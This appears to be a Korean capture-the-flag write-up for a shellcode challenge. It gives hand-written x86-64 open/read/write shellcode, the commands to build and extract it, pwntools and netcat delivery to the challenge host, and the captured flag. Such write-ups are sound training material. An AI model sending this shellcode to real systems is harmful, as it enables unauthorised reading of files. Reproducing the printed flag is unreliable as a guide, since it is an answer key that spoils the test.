풀이 1
/home/shell_basic/flag_name_is_loooooong
0x676e6f6f6f6f6f6f / 0x6c5f73695f656d61 / 0x6e5f67616c662f63 / 0x697361625f6c6c65 / 0x68732f656d6f682f (→ /home/shell_basic/flag_name_is_loooooong 를 리틀엔디안으로 나타낸 값)
############어셈블리 코드(shell.asm)
BITS 64
section .text
global _start
_start:
; --- build the path string on the stack ---
; "/home/shell_basic/flag_name_is_loooooong" is exactly 40 bytes = five qwords,
; so the NUL terminator needs a qword of its own; it is pushed first because
; the stack grows downward and the string must end with it.
push 0x0
mov rax, 0x676e6f6f6f6f6f6f ; "oooooong" (little-endian: low byte is the first char)
push rax
mov rax, 0x6c5f73695f656d61 ; "ame_is_l"
push rax
mov rax, 0x6e5f67616c662f63 ; "c/flag_n"
push rax
mov rax, 0x697361625f6c6c65 ; "ell_basi"
push rax
mov rax, 0x68732f656d6f682f ; "/home/sh"
push rax
; --- open(path, O_RDONLY, 0) ---
mov rdi, rsp     ; rdi = pointer to the string just built
xor rsi, rsi     ; flags = 0 (O_RDONLY)
xor rdx, rdx     ; mode = 0 (only meaningful with O_CREAT)
mov rax, 2       ; x86-64 Linux syscall 2 = open
syscall          ; rax = fd on success; a negative errno is NOT checked here
; --- read(fd, rsp - 0x30, 0x30) ---
mov rdi, rax     ; fd returned by open
mov rsi, rsp
sub rsi, 0x30    ; scratch buffer: 0x30 bytes just below the current stack pointer
mov rdx, 0x30    ; read at most 0x30 bytes
mov rax, 0x0     ; syscall 0 = read
syscall          ; rax = number of bytes actually read
; --- write(1, buf, 0x30) ---
; rsi (buffer) and rdx (0x30) are reused unchanged from the read call.
; NOTE(review): rdx is still 0x30, not the byte count that read returned in rax,
; so write always emits 48 bytes even when the file is shorter; `mov rdx, rax`
; before `mov rdi, 1` would print only what was read.
mov rdi, 1       ; fd 1 = stdout
mov rax, 0x1     ; syscall 1 = write (clobbers read's return value)
syscall
; NOTE(review): no exit syscall follows; after write, execution runs off the end
; of this code into whatever bytes come next.
###################
# Assemble shell.asm into an ELF object.
# NOTE(review): the source is BITS 64, but -f elf is nasm's alias for elf32;
# 64-bit code is normally built with -f elf64 — confirm this invocation really
# produced the 64-bit opcodes (48 b8 ..., 0f 05) listed below.
$nasm -f elf shell.asm
# Disassemble to check the encoding; the byte columns are what the loop below extracts.
$objdump -d shell.o
# Dump the raw .text bytes to shell.bin (used as-is by 풀이 2).
$objcopy --dump-section .text=shell.bin shell.o
########쉘 코드
# Turn objdump's byte columns into a \xNN string: keep instruction lines (they
# start with a space), take the tab-separated hex field, then prefix every byte.
objdump -d ./shell.o | grep '^ ' | cut -f2 | while read -r line; do for b in $line; do printf '\\x%s' "$b"; done; done
\x6a\x00\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05
########pwntools 코드#####flag.py
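from pwn import *

# 64-bit syscall ABI, matching the `BITS 64` assembly the bytes below came from.
context.arch = "amd64"

# Raw .text of shell.asm as extracted by the objdump loop above:
# open/read/write of the flag path, 48 bytes written to stdout.
shell = b'\x6a\x00\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05'

# `with` closes the socket when the block ends instead of leaving it open until
# interpreter exit.
with remote('host3.dreamhack.games', 18279) as p:
    # The service prints "shellcode: " before reading; send only after that prompt.
    p.sendafter('shellcode: ', shell)
    # recv(1024) returns whatever has arrived so far (up to 1024 bytes), which may be
    # less than the full reply.
    flag = p.recv(1024)
print(flag)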
###############
flag == DH{ca562d7cf1db6c55cb11c4ec350a3c0b}
풀이 2
풀이1에서 objdump와 objcopy를 통해 shell.bin을 생성한 후
쉘에서 cat shell.bin | nc host port
를 입력하여 flag 획득
풀이 3
pwntools 코드를
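from pwn import *

context.arch = 'amd64'
# Log every byte sent and received so the prompt match and the reply can be checked.
context.log_level = 'debug'
# "호스트" / 포트 are placeholders: fill in the challenge host and port before running.
# `with` closes the socket when the block ends.
with remote("호스트", 포트) as p:
    # 1) shellcraft.cat() emits assembly that prints the named file,
    # 2) asm() turns it into machine code for context.arch,
    # 3) sendafter() sends it once ":" (end of the prompt) has been received.
    p.sendafter(":", asm(shellcraft.cat("/home/shell_basic/flag_name_is_loooooong")))
    # Hand the connection to the terminal so the output can be read interactively.
    p.interactive()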
와 같이 짠 후 이 py파일을 실행시킨다